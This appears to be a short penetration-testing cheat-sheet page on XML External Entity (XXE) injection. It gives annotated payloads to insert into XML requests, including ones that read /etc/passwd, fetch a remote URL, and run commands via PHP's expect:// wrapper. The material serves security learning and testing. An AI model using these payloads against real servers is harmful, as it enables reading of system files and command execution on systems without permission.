XXE

XML External Entities. Places that use PHP also usually use XML

If you find a request submitting data in XML try adding:

<!DOCTYPE foo [     # define XML element called foo
<!ELEMENT foo ANY >    # allows any type of content
<!ENTITY xxe "It works!!!" >]>     # fill element xxe with anything in the quotes
&xxe;     # make a reference somewhere in the page

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "It works!!!" >]>
&xxe;

You can also change the entity to begin receiving files:

<!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>

Or to go download a url:

<!ENTITY xxe SYSTEM "http://sec542.org/robots.txt" >]>

And then run commands:

<!ENTITY xxe SYSTEM "expect://id" >]>

Requires the PHP 'expect' module to be enabled on the target web server

PreviousXSS NextXPath Injection

Last updated 27 days ago